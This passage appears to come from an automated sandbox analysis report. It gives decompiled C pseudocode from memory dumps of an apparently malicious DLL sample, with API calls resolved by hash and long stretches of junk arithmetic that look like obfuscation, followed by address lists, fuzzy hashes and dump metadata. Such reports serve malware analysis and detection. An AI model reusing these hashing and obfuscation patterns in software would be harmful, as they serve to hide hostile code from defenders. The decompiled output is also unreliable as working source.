				_v88 = _t62;
				0x640c47b0();
				r13d = r13d - _v88;
				if (_a8 == 0) goto 0x640c3e50;
				E00000201201640C908C(0x4217c141, _t123,  *((intOrPtr*)(_t154 + 0x20)));
				if (_t123 == 0) goto 0x640c3e8b;
				r8d = 0;
				_t26 =  &_v88; // 0xfb849f37
				_v104 = 0x20;
				_v112 = _t26;
				_t29 =  &_v64; // 0xfb849f4f
				r8b = r13d == 0;
				_v120 = _t29;
				r9d = 0;
				 *_t123();
				goto 0x640c3e8d;
				E00000201201640C908C(0x8ea73a36, _t123, _v80);
				if (_t123 == 0) goto 0x640c3e8b;
				r8d = 0;
				_t32 =  &_v88; // 0xfb849f37
				_v112 = _t32;
				r8b = r13d == 0;
				_t34 =  &_v64; // 0xfb849f4f
				_v120 = _t34;
				r9d = 0;
				 *_t123();
				goto 0x640c3e8d;
				if (0 == 0) goto 0x640c3eb9;
				r8d = _v88;
				0x640c47b0();
				r12d = r12d + _v88;
				if (r13d == 0) goto 0x640c3ed7;
				goto 0x640c3dd2;
				E00000201201640C908C(0xc06f8334, _t123,  *((intOrPtr*)(_t154 + 0x18)));
				if (_t123 == 0) goto 0x640c3ed2;
				 *_t123();
				goto 0x640c3ed7;
				_t124 = _a40;
				 *_t124 = r12d;
				E00000201201640C908C(0xff709000, _t124,  *((intOrPtr*)(_t154 + 0x20)));
				if (_t124 == 0) goto 0x640c3efc;
				 *_t124();
				E00000201201640C908C(0xbaca8f4d, _t124,  *((intOrPtr*)(_t154 + 0x20)));
				if (_t124 == 0) goto 0x640c3f38;
				 *_t124();
				goto 0x640c3f38;
				E00000201201640C908C(0xc06f8334, _t124,  *((intOrPtr*)(_t154 + 0x18)));
				if (_t124 == 0) goto 0x640c3f33;
				 *_t124();
				goto 0x640c3f38;
				return 0x7f;
			}



















                                0x201640c3cd8
                                0x201640c3cdb
                                0x201640c3cdf
                                0x201640c3ce3
                                0x201640c3ce7
                                0x201640c3cf7
                                0x201640c3d0d
                                0x201640c3d10
                                0x201640c3d18
                                0x201640c3d1f
                                0x201640c3d25
                                0x201640c3d2a
                                0x201640c3d32
                                0x201640c3d34
                                0x201640c3d3a
                                0x201640c3d40
                                0x201640c3d55
                                0x201640c3d63
                                0x201640c3d6c
                                0x201640c3d6c
                                0x201640c3d75
                                0x201640c3d83
                                0x201640c3d8b
                                0x201640c3d9a
                                0x201640c3d9d
                                0x201640c3d9f
                                0x201640c3da5
                                0x201640c3db0
                                0x201640c3db8
                                0x201640c3dba
                                0x201640c3dbe
                                0x201640c3dc7
                                0x201640c3dcd
                                0x201640c3de0
                                0x201640c3de8
                                0x201640c3deb
                                0x201640c3def
                                0x201640c3df8
                                0x201640c3e0b
                                0x201640c3e12
                                0x201640c3e1a
                                0x201640c3e1c
                                0x201640c3e1f
                                0x201640c3e24
                                0x201640c3e2c
                                0x201640c3e31
                                0x201640c3e39
                                0x201640c3e3d
                                0x201640c3e47
                                0x201640c3e4c
                                0x201640c3e4e
                                0x201640c3e55
                                0x201640c3e5d
                                0x201640c3e5f
                                0x201640c3e62
                                0x201640c3e6a
                                0x201640c3e6f
                                0x201640c3e73
                                0x201640c3e78
                                0x201640c3e82
                                0x201640c3e87
                                0x201640c3e89
                                0x201640c3e8f
                                0x201640c3e91
                                0x201640c3e9e
                                0x201640c3ea7
                                0x201640c3eb2
                                0x201640c3eb4
                                0x201640c3ec2
                                0x201640c3eca
                                0x201640c3ecc
                                0x201640c3ed0
                                0x201640c3ed7
                                0x201640c3ee4
                                0x201640c3eeb
                                0x201640c3ef3
                                0x201640c3efa
                                0x201640c3f05
                                0x201640c3f0d
                                0x201640c3f16
                                0x201640c3f18
                                0x201640c3f23
                                0x201640c3f2b
                                0x201640c3f2d
                                0x201640c3f31
                                0x201640c3f57

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: ErrorLast
                                • String ID: $@
                                • API String ID: 1452528299-1077428164
                                • Opcode ID: 7c51c71e63158f765adb5c91cb5b66e3a07b5bc89c7899e7a300cc364f0e630c
                                • Instruction ID: f832a67ab4802aee488280d268a2847a55a2ee95c658bd11840768c19720cbc0
                                • Opcode Fuzzy Hash: 7c51c71e63158f765adb5c91cb5b66e3a07b5bc89c7899e7a300cc364f0e630c
                                • Instruction Fuzzy Hash: A761B232324761C7EB60DB61A84679A67A5FBCC784F140415BF4D83B9EDF3AC8258B08
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E76E0 Relevance: 1.8, Strings: 1, Instructions: 555COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E00007FFC7FFC130E76E0(short __edx, void* __rcx, long long __r8, signed int* __r9) {
				void* __rbx;
				void* __rdi;
				signed int _t369;
				signed int _t389;
				signed int _t393;
				signed int _t412;
				signed int _t423;
				intOrPtr _t426;
				intOrPtr _t433;
				long long _t439;
				signed int _t464;
				signed int _t502;
				signed int _t503;
				signed int _t512;
				signed long long _t515;
				signed int _t530;
				signed char _t533;
				signed int _t539;
				void* _t579;
				long long _t592;
				intOrPtr _t593;
				signed long long _t595;
				signed long long _t596;
				signed long long _t597;
				signed short _t599;
				signed long long _t600;
				signed long long _t603;
				signed long long _t604;
				intOrPtr _t606;
				intOrPtr _t609;
				signed long long _t610;
				signed long long _t611;
				intOrPtr _t612;
				signed long long _t613;
				intOrPtr _t618;
				intOrPtr _t620;
				signed long long _t622;
				intOrPtr _t623;
				signed long long _t626;
				intOrPtr _t627;
				intOrPtr _t629;
				signed long long _t630;
				signed long long _t631;
				intOrPtr _t637;
				signed int* _t638;
				intOrPtr _t640;
				signed long long _t650;
				signed long long _t652;
				signed long long _t658;
				signed long long _t664;
				intOrPtr _t675;
				intOrPtr _t684;
				signed long long _t687;
				signed long long _t688;
				signed long long _t690;
				signed long long _t691;
				signed long long _t693;
				void* _t695;
				signed int* _t696;
				signed int* _t697;
				void* _t699;
				signed long long _t702;
				signed int* _t706;
				void* _t710;
				void* _t711;
				signed long long _t716;
				signed long long _t717;
				intOrPtr _t719;
				intOrPtr _t720;
				long long _t723;
				signed char _t725;
				signed long long _t726;
				long long _t734;
				signed long long _t735;
				signed long long _t742;
				intOrPtr _t743;
				long long _t745;
				void* _t746;
				signed long long _t747;
				signed long long _t748;
				signed long long _t749;
				void* _t751;
				void* _t754;
				intOrPtr _t755;
				intOrPtr _t756;
				signed long long _t757;
				void* _t760;
				signed long long _t761;
				signed long long _t762;
				signed long long _t763;
				signed long long _t765;

				 *((long long*)(_t710 + 0x18)) = __r8;
				 *((short*)(_t710 + 0x10)) = __edx;
				_t711 = _t710 - 0xa8;
				_t755 =  *((intOrPtr*)(_t711 + 0x110));
				r8d =  *0x13124130 & 0x0000ffff;
				_t761 =  *(_t711 + 0x130);
				 *(_t711 + 0x108) =  *0x13124158 & 0x000000ff;
				_t592 =  *0x13124178; // 0x0
				 *((long long*)(_t711 + 0x68)) = _t592;
				 *((long long*)(_t711 + 0x88)) = _t592;
				_t369 =  *0x13124148; // 0x0
				r9d =  *0x13124134; // 0x0
				 *(_t711 + 0xf0) =  *(_t755 + (_t369 + _t369) * 4) & 0x000000ff;
				r9d = r9d + 1;
				_t593 =  *0x13124128; // 0x0
				 *(_t711 + 0x60) = r9d;
				_t747 =  *((intOrPtr*)(_t593 + 0x6f80));
				 *0x13124134 = r9d;
				 *0x13124133 =  *0x13124133 + 1;
				_t696 =  *((intOrPtr*)(_t755 + 0x7148)) - 0x1a89;
				 *(_t711 + 0x90) = _t696;
				_t595 =  *0x13124124;
				_t742 = _t696[_t761] &  *0x533d & _t595;
				 *(_t711 + 0x70) = _t742;
				asm("cdq");
				 *(0x32c + ( *_t696 +  *_t696) * 4) = 0x111b /  *(0x32c + ( *_t696 +  *_t696) * 4);
				_t723 = _t747 * 8;
				 *(_t711 + 0x80) = _t595;
				 *((long long*)(_t711 + 0x78)) = _t723;
				 *(__rcx + _t595 * 4) = r11d;
				_t684 =  *0x13124178; // 0x0
				 *(_t684 + _t723) = ( *(_t684 + _t723) & 0x0000ffff) * ( *0x13124123 & 0x000000ff);
				_t596 =  *0x13124128; // 0x0
				 *0x13124180 = _t596;
				_t685 =  *_t696;
				_t41 = _t685 + 1; // 0x1
				 *_t696 = _t41;
				_t530 =  *0x1312414c; // 0x0
				_t44 = _t685 + 0x1b; // 0x1b
				r11d =  *(_t596 + _t596 * 2 + 0x3996) & 0x000000ff;
				_t597 =  *0x13124138; // 0x0
				_t734 =  *((intOrPtr*)(_t597 + _t44 * 8));
				 *0x1312414c = _t530 + 1;
				 *((long long*)(_t711 + 0x58)) =  *(__r8 + 0xab0) * 0x1a29;
				 *(_t711 + 0x50) = 0x172d;
				 *((long long*)(_t711 + 0x48)) = _t734;
				 *(_t711 + 0x40) = 0x913;
				r8d = 0x172d;
				 *(_t711 + 0x38) = _t742;
				 *((long long*)(_t711 + 0x30)) = 0x641;
				 *(_t711 + 0x28) = 0x1d5d;
				 *(_t711 + 0x20) =  *(0x32c + _t747 * 4) * ( *0x13124133 & 0x000000ff);
				_t389 = E00007FFC7FFC130FCB60( *(0x32c + _t747 * 4) * ( *0x13124133 & 0x000000ff),  *(__r8 + 0xab0) * 0x1a29,  *_t696, __r8,  *((intOrPtr*)(__r8 +  *_t696 * 4)));
				_t743 =  *((intOrPtr*)(_t711 + 0x100));
				__r9[_t597] = _t389;
				_t533 =  *0x13124158; // 0x0
				_t393 =  *0x13124148; // 0x0
				 *(_t711 + 0x130) = _t533;
				_t650 = _t393 + 4;
				 *((intOrPtr*)(_t743 + _t650 * 4)) = r15d;
				r9d =  *0x13124168; // 0x0
				r8d =  *0x13124148; // 0x0
				r9d = r9d + _t533;
				r8d = r8d - 1;
				 *0x13124148 = r8d;
				 *0x13124168 = r9d;
				if ( *((intOrPtr*)(_t743 + _t650 * 8)) - ( *(_t747 +  *((intOrPtr*)(_t711 + 0x120))) & 0x000000ff) < 0) goto 0x130e808e;
				_t687 =  *0x131241a0; // 0x0
				if ( *((intOrPtr*)(__rcx + _t687 * 4)) - r8d < 0) goto 0x130e8000;
				r10d = 0x1e56;
				 *((long long*)(_t711 + 0x100)) = _t734;
				if ( *((intOrPtr*)(__rcx + r8d * 4)) - _t734 < 0) goto 0x130e7ffd;
				_t599 =  *0x13124170; // 0x0
				_t725 =  *0x13124158; // 0x0
				_t600 = _t599 + 1;
				 *0x13124170 = _t600;
				if (_t725 - _t600 <= 0) goto 0x130e7ff3;
				_t652 = _t600 + _t600 * 2;
				if (__r9[_t652] ==  *((intOrPtr*)(__rcx + 0x90 + _t761 * 4))) goto 0x130e7af2;
				if ( *((intOrPtr*)(__rcx +  *(_t711 + 0x70) * 4)) - 0x11b0 <= 0) goto 0x130e7af2;
				_t688 = _t687 - 1;
				 *0x131241a0 = _t688;
				if (_t725 - _t652 > 0) goto 0x130e7a41;
				_t603 =  *((intOrPtr*)(_t711 + 0x118));
				if (0x672 -  *((intOrPtr*)(_t603 + 0x3d74)) < 0) goto 0x130e7a41;
				 *(_t755 + _t761 * 8) =  *(_t755 + _t761 * 8) ^ 0x00000507;
				 *0x13124133 = ( *0x13124133 & 0x000000ff) * (( *(_t696 + _t761 * 8 - 8) & 0x000000ff) +  *((intOrPtr*)( *((intOrPtr*)(_t711 + 0x120)) + 0xddb)) & 0x000000ff);
				goto 0x130e819f;
				_t726 =  *((intOrPtr*)(_t711 + 0x88));
				_t762 = _t761 - 1;
				r10d =  *(_t711 + 0xf8) & 0x0000ffff;
				_t604 = _t688;
				__r9[0x20 + _t603 * 4] = _t603 /  *(_t726 +  *__r9 * 8) % __r9[0x20 + _t603 * 4];
				 *((intOrPtr*)(0x32c +  *__r9 * 4)) =  *((intOrPtr*)(0x32c +  *__r9 * 4)) + ( *0x13124190 & 0x0000ffff);
				_t412 =  *0x13124134; // 0x0
				 *0x13124130 =  *0x13124130 | ( *0x13124123 & 0x000000ff) - 0x00000001;
				 *(_t755 + _t747 * 4) =  *(_t755 + _t747 * 4) ^ _t412 -  *0x13124180;
				_t748 = _t747 + 1;
				 *0x13124150 = _t604;
				_t658 = _t604 * 4;
				 *((intOrPtr*)(__rcx + 0x7574)) =  *((intOrPtr*)(__rcx + 0x7574)) +  *((intOrPtr*)(_t726 + _t658 * 8));
				goto 0x130e7f04;
				_t706 =  *((intOrPtr*)(_t711 + 0x118));
				_t637 =  *((intOrPtr*)(_t711 + 0x68));
				asm("cdq");
				 *0x13124148 = (_t706[0x877] & 0x0000ffff) % r8d;
				 *(_t637 +  *__r9 * 8) = _t658 ^  *(_t637 +  *__r9 * 8) ^ 0x00001fe9;
				_t606 =  *0x13124140; // 0x0
				 *((intOrPtr*)(_t606 + (_t762 + _t762) * 8)) = 0x109d;
				_t502 =  *0x1312414c; // 0x0
				_t539 =  *0x13124122 & 0x000000ff;
				_t503 = _t502 ^ 0x00001dd4;
				 *0x1312414c = _t503;
				if (_t539 - 0xb51 >= 0) goto 0x130e7a39;
				if ( *((intOrPtr*)(_t743 + (_t762 + 1 + _t762 + 1) * 8)) - 0x689 >= 0) goto 0x130e7a39;
				_t579 = _t539 -  *0x13124123; // 0x0
				if (_t579 == 0) goto 0x130e7a39;
				if ( *((long long*)(_t637 + 8 + _t762 * 8)) - 0x19b8 >= 0) goto 0x130e7a39;
				r8d =  *(_t711 + 0x60);
				r9d = r8b & 0xffffffff;
				if (r9d !=  *(_t711 + 0x130)) goto 0x130e7df1;
				if (( *(_t711 + 0x108) & 0x000000ff) - 0x1825 <= 0) goto 0x130e7df1;
				if ( *0x13124194 - 0x23a < 0) goto 0x130e7df1;
				_t609 =  *0x13124128; // 0x0
				r8b = r8b - 1;
				_t735 =  *(_t711 + 0x80);
				_t756 =  *((intOrPtr*)(_t711 + 0x128));
				 *((long long*)(_t711 + 0x58)) = 0x321;
				r8d = r8b & 0xffffffff;
				 *((intOrPtr*)(__rcx + (_t735 + _t735 * 2) * 4)) =  *((intOrPtr*)(_t609 + _t503 * 4));
				_t610 =  *0x13124188; // 0x0
				_t664 =  *0x13124178; // 0x0
				_t638 =  *((intOrPtr*)(_t610 + 0x2a1c));
				r9d =  *(_t756 + _t610 * 2) & 0x0000ffff;
				_t611 =  *0x131241a0; // 0x0
				_t423 =  *0x1312414c; // 0x0
				asm("cdq");
				 *(_t711 + 0x50) = _t611;
				 *((long long*)(_t711 + 0x48)) = 0x1400;
				 *(_t711 + 0x40) = 0xf51;
				 *(_t711 + 0x38) = _t664;
				 *((long long*)(_t711 + 0x30)) = _t423 % r8d;
				 *(_t711 + 0x28) = 0x180d40a;
				 *(_t711 + 0x20) = _t706;
				_t426 = E00007FFC7FFC130FCB60(_t638, _t664, _t735 + _t735 * 2, _t638, _t726 & _t664);
				r9d = 0x7c;
				 *((intOrPtr*)(__rcx + _t611 * 4)) = _t426;
				_t716 =  *0x13124180; // 0x0
				r9b = r9b -  *0x13124133;
				_t717 = _t716 + 1;
				 *0x13124132 = 0x125b % ( *0x13124132 & 0x000000ff);
				_t690 =  *0x13124170; // 0x0
				 *0x13124180 = _t717;
				_t691 = _t690 ^ 0x00000d0b;
				 *0x13124148 = 0x1a17;
				 *0x13124133 = r9b;
				_t612 =  *0x13124128; // 0x0
				_t613 =  *0x13124168;
				_t702 =  *( *((intOrPtr*)(_t711 + 0x78)) + _t612) ^ _t613;
				_t433 =  *0x13124194; // 0x0
				_t697 = _t433 -  *(_t711 + 0x130) + 2;
				 *_t613 =  *_t613 + 1;
				r8d =  *_t613;
				r10d =  *0x13124170 & 0x0000ffff;
				_t196 = _t717 + 3; // 0x4
				_t745 = ( *(_t711 + 0x90))[_t196];
				r8d = 0xaf4;
				 *(_t711 + 0x40) =  *( *((intOrPtr*)(_t711 + 0x68)) + (_t717 + _t717 * 2) * 8) *  *(_t711 + 0x70);
				 *(_t711 + 0x38) = r10w;
				 *((long long*)(_t711 + 0x30)) = _t745;
				 *(_t711 + 0x28) = _t638;
				 *(_t711 + 0x20) = _t697;
				_t439 = E00007FFC7FFC130E36A0(_t638,  *(__r9 + 8 + _t611 * 4) |  *0x131241a0, _t691, _t697, _t717 + _t717 * 2, _t735, _t760, _t754, _t751);
				r10d =  *(_t711 + 0xf8) & 0x0000ffff;
				_t618 =  *0x13124138; // 0x0
				 *((long long*)(_t618 + 0x30 + _t735 * 8)) = _t439;
				 *0x13124122 = 0x22;
				 *((short*)(_t756 + 8 + _t762 * 8)) =  *0x13124133 & 0x000000ff;
				_t763 = _t762 + 2;
				_t757 =  *((intOrPtr*)(_t711 + 0x110));
				goto 0x130e7f04;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t711 + 0x78)) + _t745)) - ( *(_t711 + 0xf8) & 0x0000ffff) >= 0) goto 0x130e7f58;
				asm("cdq");
				 *((_t748 + 1 << 4) + 0xb65) = 0x1d5d %  *((_t748 + 1 << 4) + 0xb65);
				 *(_t757 + 0x4e00) =  *(_t757 + 0x4e00) &  *0x1312416c & 0x0000ffff;
				_t719 =  *0x13124160; // 0x0
				asm("cdq");
				 *(_t719 + _t763) = 0xfffffcfa / ( *(_t719 + _t763) & 0x000000ff);
				_t620 =  *0x13124128; // 0x0
				 *0x13124132 = 0x80;
				if (r9d -  *((intOrPtr*)(_t620 +  *_t697 * 4)) >= 0) goto 0x130e7ef3;
				 *(_t702 + 4 + _t763 * 4) =  *(_t702 + 4 + _t763 * 4) & r9d;
				_t512 =  *(_t757 + 0x13800);
				if (_t512 - ( *0x13124130 & 0x0000ffff) > 0) goto 0x130e7edc;
				r11d = bpl & 0xffffffff;
				r11d = r11d - r9d;
				 *(0x32c + _t702 * 4) =  *(0x32c + _t702 * 4) * r9d;
				asm("cdq");
				r8d = r11d / _t512;
				_t622 =  *0x131241a0; // 0x0
				 *(_t702 + 8 + _t622 * 4) = r8d;
				if (_t512 + 1 - ( *0x13124130 & 0x0000ffff) <= 0) goto 0x130e7eb0;
				r9d = r9d + 1;
				_t623 =  *0x13124128; // 0x0
				if (r9d -  *((intOrPtr*)(_t623 +  *_t697 * 4)) < 0) goto 0x130e7e80;
				_t640 =  *((intOrPtr*)(_t711 + 0x100));
				r10d =  *(_t711 + 0xf8) & 0x0000ffff;
				_t720 =  *0x13124138; // 0x0
				_t765 = _t763 - 1 << 5;
				 *(_t720 + _t765) =  *(_t720 + _t765) & _t691;
				_t515 =  *0x13124150; // 0x0
				 *((intOrPtr*)(_t757 + (_t748 + _t748 * 2) * 4)) = _t515 -  *((intOrPtr*)(_t757 + (_t748 + _t748 * 2) * 4));
				_t675 =  *0x13124138; // 0x0
				 *(_t675 + 0x98 + _t748 * 8) =  *(_t675 + 0x98 + _t748 * 8) | 0x00001d60;
				goto 0x130e819f;
				r8b = r8b - 1;
				_t626 =  *0x13124148;
				 *(__rcx + _t626 * 4) =  *((intOrPtr*)(0x32c +  *0x13124124 * 4)) - 0x000002a3 & r10d;
				_t693 = ( *0x452a & 0x000000ff) - (0x909243fb * ( *0x452a & 0x000000ff) >> 0x20 >> 0xc) * 0x1c55;
				 *(_t745 + 0x4e10) =  *(_t640 + 0x2e78) *  *0x2a0c;
				 *(_t640 + _t626 * 8) =  *(_t640 + _t626 * 8) & _t626;
				_t464 =  *0x13124148; // 0x0
				 *((intOrPtr*)(_t745 + (_t464 + 0xc) * 4)) =  *((intOrPtr*)(_t745 + (_t464 + 0xc) * 4)) + ( *(_t711 + 0xf0) & 0x000000ff);
				 *((intOrPtr*)(_t745 + 0x4e1c)) =  *((intOrPtr*)(_t745 + 0x4e1c)) + 0x1bcb;
				goto 0x130e819f;
				goto 0x130e8000;
				 *(__rcx + 0x19cc) =  *(__rcx + 0x19cc) * 0x81c;
				r8d =  *0x13124190 & 0x0000ffff;
				_t749 = _t693;
				if (r8d - ( *(_t711 + 0xf0) & 0x000000ff) <= 0) goto 0x130e7efb;
				_t627 =  *0x13124128; // 0x0
				 *0x13124132 = r8b;
				r8d = r8d + 1;
				if (r8d - ((bpl & 0xffffffff) +  *((intOrPtr*)(_t627 + (_t693 + _t693 * 2) * 4 + 0x1c)) & 0x000000ff) > 0) goto 0x130e8070;
				goto 0x130e7efb;
				r14d =  *0x13124132 & 0x000000ff;
				_t629 =  *0x13124188; // 0x0
				r15d = 0x1e57;
				_t630 =  *0x13124170; // 0x0
				r11d =  *(0xb65 + _t630 * 4) & 0x0000ffff;
				_t631 = r8d;
				r8d =  *0x3c9d & 0x000000ff;
				r9d =  *(0xb65 + _t631 * 4);
				r9d = r9d + r8d;
				r8d =  *(_t711 + 0xf0) & 0x000000ff;
				r8d = 0x5a2058;
				 *(_t711 + 0x40) = r9d;
				 *(_t711 + 0x38) = r11w;
				 *((long long*)(_t711 + 0x30)) =  *((intOrPtr*)(_t629 + 8 + (_t765 + _t765) * 8));
				 *(_t711 + 0x28) = _t697;
				 *(_t711 + 0x20) = _t697[ *(_t711 + 0x80)] - ( *(_t711 + 0x60) & 0x000000ff);
				 *0x13124148 = E00007FFC7FFC130E36A0( *((intOrPtr*)(_t629 + 8 + (_t765 + _t765) * 8)), _t757 | 0x00001b57, _t627 + (_t693 + _t693 * 2) * 4, _t697, _t720, r9d, _t746, _t695, _t699);
				 *((intOrPtr*)( *((intOrPtr*)(_t711 + 0x68)) + (_t749 + 0xe + _t749 + 0xe) * 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t711 + 0x68)) + (_t749 + 0xe + _t749 + 0xe) * 8)) + _t631;
				 *(__rcx + 0x19e0) =  *(__rcx + 0x19e0) |  *((intOrPtr*)( *((intOrPtr*)(_t711 + 0x88)) + 0xaa10)) + 0x0000161d;
				 *((short*)( *((intOrPtr*)(_t711 + 0x128)) + 0x34 + _t749 * 2)) = ( *(_t711 + 0x90))[0x13d7] & 0x0000ffff;
				return r15d;
			}






























































































                                0x7ffc130e76e0
                                0x7ffc130e76e5
                                0x7ffc130e76f6
                                0x7ffc130e7707
                                0x7ffc130e771c
                                0x7ffc130e7724
                                0x7ffc130e772c
                                0x7ffc130e7733
                                0x7ffc130e7741
                                0x7ffc130e774d
                                0x7ffc130e7755
                                0x7ffc130e7765
                                0x7ffc130e776c
                                0x7ffc130e7773
                                0x7ffc130e7776
                                0x7ffc130e777d
                                0x7ffc130e7782
                                0x7ffc130e7789
                                0x7ffc130e7797
                                0x7ffc130e77a2
                                0x7ffc130e77ad
                                0x7ffc130e77bc
                                0x7ffc130e77c3
                                0x7ffc130e77ca
                                0x7ffc130e77d7
                                0x7ffc130e77df
                                0x7ffc130e77ea
                                0x7ffc130e77f2
                                0x7ffc130e77fa
                                0x7ffc130e77ff
                                0x7ffc130e780b
                                0x7ffc130e781a
                                0x7ffc130e781f
                                0x7ffc130e7831
                                0x7ffc130e7838
                                0x7ffc130e7851
                                0x7ffc130e7854
                                0x7ffc130e7859
                                0x7ffc130e7865
                                0x7ffc130e786a
                                0x7ffc130e7875
                                0x7ffc130e787c
                                0x7ffc130e7880
                                0x7ffc130e7894
                                0x7ffc130e7899
                                0x7ffc130e78a2
                                0x7ffc130e78a7
                                0x7ffc130e78b0
                                0x7ffc130e78b6
                                0x7ffc130e78bb
                                0x7ffc130e78c4
                                0x7ffc130e78cd
                                0x7ffc130e78dd
                                0x7ffc130e78e2
                                0x7ffc130e78f5
                                0x7ffc130e78f8
                                0x7ffc130e78fe
                                0x7ffc130e7907
                                0x7ffc130e790e
                                0x7ffc130e7911
                                0x7ffc130e7915
                                0x7ffc130e791c
                                0x7ffc130e7923
                                0x7ffc130e792e
                                0x7ffc130e7939
                                0x7ffc130e7940
                                0x7ffc130e7950
                                0x7ffc130e7956
                                0x7ffc130e7962
                                0x7ffc130e7968
                                0x7ffc130e7971
                                0x7ffc130e7981
                                0x7ffc130e7987
                                0x7ffc130e798e
                                0x7ffc130e7995
                                0x7ffc130e7998
                                0x7ffc130e79a2
                                0x7ffc130e79b0
                                0x7ffc130e79bf
                                0x7ffc130e79d3
                                0x7ffc130e79e1
                                0x7ffc130e79e4
                                0x7ffc130e79f2
                                0x7ffc130e79f4
                                0x7ffc130e7a08
                                0x7ffc130e7a0a
                                0x7ffc130e7a33
                                0x7ffc130e7a3c
                                0x7ffc130e7a45
                                0x7ffc130e7a4d
                                0x7ffc130e7a50
                                0x7ffc130e7a8d
                                0x7ffc130e7a95
                                0x7ffc130e7aa2
                                0x7ffc130e7aa9
                                0x7ffc130e7ab5
                                0x7ffc130e7abc
                                0x7ffc130e7ac8
                                0x7ffc130e7acb
                                0x7ffc130e7adf
                                0x7ffc130e7ae6
                                0x7ffc130e7aed
                                0x7ffc130e7af2
                                0x7ffc130e7afa
                                0x7ffc130e7b06
                                0x7ffc130e7b0a
                                0x7ffc130e7b25
                                0x7ffc130e7b2c
                                0x7ffc130e7b36
                                0x7ffc130e7b3d
                                0x7ffc130e7b43
                                0x7ffc130e7b4a
                                0x7ffc130e7b50
                                0x7ffc130e7b5c
                                0x7ffc130e7b71
                                0x7ffc130e7b77
                                0x7ffc130e7b7d
                                0x7ffc130e7b8c
                                0x7ffc130e7b92
                                0x7ffc130e7b97
                                0x7ffc130e7ba3
                                0x7ffc130e7bb6
                                0x7ffc130e7bc6
                                0x7ffc130e7bcc
                                0x7ffc130e7bd3
                                0x7ffc130e7bd6
                                0x7ffc130e7bde
                                0x7ffc130e7bf1
                                0x7ffc130e7bfe
                                0x7ffc130e7c05
                                0x7ffc130e7c0a
                                0x7ffc130e7c11
                                0x7ffc130e7c1e
                                0x7ffc130e7c2d
                                0x7ffc130e7c32
                                0x7ffc130e7c3d
                                0x7ffc130e7c4e
                                0x7ffc130e7c5c
                                0x7ffc130e7c61
                                0x7ffc130e7c6a
                                0x7ffc130e7c73
                                0x7ffc130e7c86
                                0x7ffc130e7c8b
                                0x7ffc130e7c94
                                0x7ffc130e7c99
                                0x7ffc130e7ca5
                                0x7ffc130e7caf
                                0x7ffc130e7cc0
                                0x7ffc130e7cc7
                                0x7ffc130e7cce
                                0x7ffc130e7cd8
                                0x7ffc130e7cde
                                0x7ffc130e7ce5
                                0x7ffc130e7cec
                                0x7ffc130e7cf3
                                0x7ffc130e7cfd
                                0x7ffc130e7d17
                                0x7ffc130e7d29
                                0x7ffc130e7d30
                                0x7ffc130e7d33
                                0x7ffc130e7d43
                                0x7ffc130e7d4b
                                0x7ffc130e7d4d
                                0x7ffc130e7d50
                                0x7ffc130e7d58
                                0x7ffc130e7d67
                                0x7ffc130e7d84
                                0x7ffc130e7d8d
                                0x7ffc130e7d92
                                0x7ffc130e7d98
                                0x7ffc130e7d9d
                                0x7ffc130e7da2
                                0x7ffc130e7da7
                                0x7ffc130e7dac
                                0x7ffc130e7dc0
                                0x7ffc130e7dc7
                                0x7ffc130e7dd3
                                0x7ffc130e7dda
                                0x7ffc130e7de0
                                0x7ffc130e7de4
                                0x7ffc130e7dec
                                0x7ffc130e7e02
                                0x7ffc130e7e12
                                0x7ffc130e7e1d
                                0x7ffc130e7e2a
                                0x7ffc130e7e36
                                0x7ffc130e7e3d
                                0x7ffc130e7e45
                                0x7ffc130e7e49
                                0x7ffc130e7e50
                                0x7ffc130e7e5e
                                0x7ffc130e7e80
                                0x7ffc130e7e8b
                                0x7ffc130e7e98
                                0x7ffc130e7e9a
                                0x7ffc130e7ea6
                                0x7ffc130e7eb7
                                0x7ffc130e7ebd
                                0x7ffc130e7ec2
                                0x7ffc130e7ec5
                                0x7ffc130e7ecc
                                0x7ffc130e7eda
                                0x7ffc130e7edf
                                0x7ffc130e7ee2
                                0x7ffc130e7ef1
                                0x7ffc130e7ef3
                                0x7ffc130e7efb
                                0x7ffc130e7f0b
                                0x7ffc130e7f17
                                0x7ffc130e7f2e
                                0x7ffc130e7f36
                                0x7ffc130e7f3e
                                0x7ffc130e7f40
                                0x7ffc130e7f47
                                0x7ffc130e7f53
                                0x7ffc130e7f5f
                                0x7ffc130e7f69
                                0x7ffc130e7f79
                                0x7ffc130e7fa6
                                0x7ffc130e7fa9
                                0x7ffc130e7fce
                                0x7ffc130e7fd1
                                0x7ffc130e7fdf
                                0x7ffc130e7fe3
                                0x7ffc130e7fee
                                0x7ffc130e7ffb
                                0x7ffc130e800b
                                0x7ffc130e801c
                                0x7ffc130e8053
                                0x7ffc130e8059
                                0x7ffc130e805f
                                0x7ffc130e8074
                                0x7ffc130e807e
                                0x7ffc130e8087
                                0x7ffc130e8089
                                0x7ffc130e80a5
                                0x7ffc130e80cf
                                0x7ffc130e80db
                                0x7ffc130e80e1
                                0x7ffc130e80e8
                                0x7ffc130e80f1
                                0x7ffc130e80f4
                                0x7ffc130e80fd
                                0x7ffc130e8108
                                0x7ffc130e810b
                                0x7ffc130e811a
                                0x7ffc130e8120
                                0x7ffc130e8128
                                0x7ffc130e8130
                                0x7ffc130e8135
                                0x7ffc130e813a
                                0x7ffc130e814e
                                0x7ffc130e8160
                                0x7ffc130e8178
                                0x7ffc130e8196
                                0x7ffc130e81b2

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
